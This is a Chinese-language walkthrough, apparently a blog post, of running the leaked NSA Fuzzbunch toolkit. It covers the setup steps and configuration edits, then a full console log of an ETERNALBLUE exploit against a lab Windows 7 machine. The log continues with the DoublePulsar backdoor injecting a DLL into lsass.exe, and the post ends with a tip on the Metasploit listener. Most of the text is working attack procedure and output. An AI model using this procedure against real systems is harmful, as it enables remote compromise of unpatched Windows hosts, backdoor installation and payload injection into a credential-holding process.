0x01 Download NSA工具包
NSA工具包下载
攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境:
python-2.6.6.msi、pywin32-221.win32-py2.6.exe
0x02 修改NSA工具配置文件
- 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件
注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
def load_plugins(fb):
fb.io.pre_input(None)
fb.io.print_msg("Loading Plugins")
fb.io.post_input()
addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin)
addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin)
addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin)
addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)
#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager)
- 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml文件
修改第19行代码的Resources路径和第24行代码的logs路径,改成目前工具包存放的路径
<t:parameter name="ResourcesDir"
description="Absolute path of the Resources Directory"
type="String"
default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir"
description="Absolute path of an Initial Log Directory"
type="String"
default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>
0x03 运行fb.py脚本实施ETERNALBLUE攻击
测试机 Windows 7/2008 10.130.3.246
攻击机 Windows 10 10.130.3.243
攻击机 Kali 10.130.3.242
运行C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件
Microsoft Windows [版本 10.0.18363.1316]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\Users\Administrator\Desktop\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 10.130.3.246
[?] Default Callback IP Address [] : 10.130.3.242
[?] Use Redirection [yes] : no
[?] Base Log directory [C:\Users\Administrator\Desktop\shadowbroker-master... (plus 13 characters)] :
[*] Checking C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs for projects
Index Project
----- -------
0 Create a New Project
[?] Project [0] :
[?] New Project Name :
[?] Set target log directory to 'C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 10.130.3.246
[+] Set CallbackIp => 10.130.3.242
[!] Redirection OFF
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246
Module: Global Variables
========================
Name Value
---- -----
ResourcesDir C:\Users\Administrator\Desktop\shadowbroker-master
\windows\Resources
Color True
ShowHiddenParameters False
FbStorage C:\Users\Administrator\Desktop\shadowbroker-master
\windows\storage
LogDir C:\Users\Administrator\Desktop\shadowbroker-master
\windows\logs\z10.130.3.246
TargetIp 10.130.3.246
CallbackIp 10.130.3.242
TmpDir C:\Users\Administrator\Desktop\shadowbroker-master
\windows\logs\z10.130.3.246
NetworkTimeout 60
fb >
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.130.3.246] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
[*] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] :
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
0x00000020 50 61 63 6b 20 31 00 Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
..........DONE.
DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor NOT installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Trying again with 17 Groom Allocations
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
0x00000020 50 61 63 6b 20 31 00 Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.....DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Payload (Doublepulsar) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
DllPayload C:\x86.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [10.130.3.246] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
0) x86 x86 32-bits
*1) x64 x64 64-bits
[?] Architecture [1] :
[*] Function :: Operation for backdoor to perform
0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
*2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [2] :
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [C:\x86.dll] : C:\\x64.dll
[+] Set DllPayload => C:\\x64.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.130.3.246
TargetPort 445
DllPayload C:\x64.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x33521E64
SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
这里Eternalblue攻击如果失败了可以多试几次
成功之后再使用Doublepulsar
执行攻击
msf的监听别忘了要设置为x64,否则session会die
| 
转播
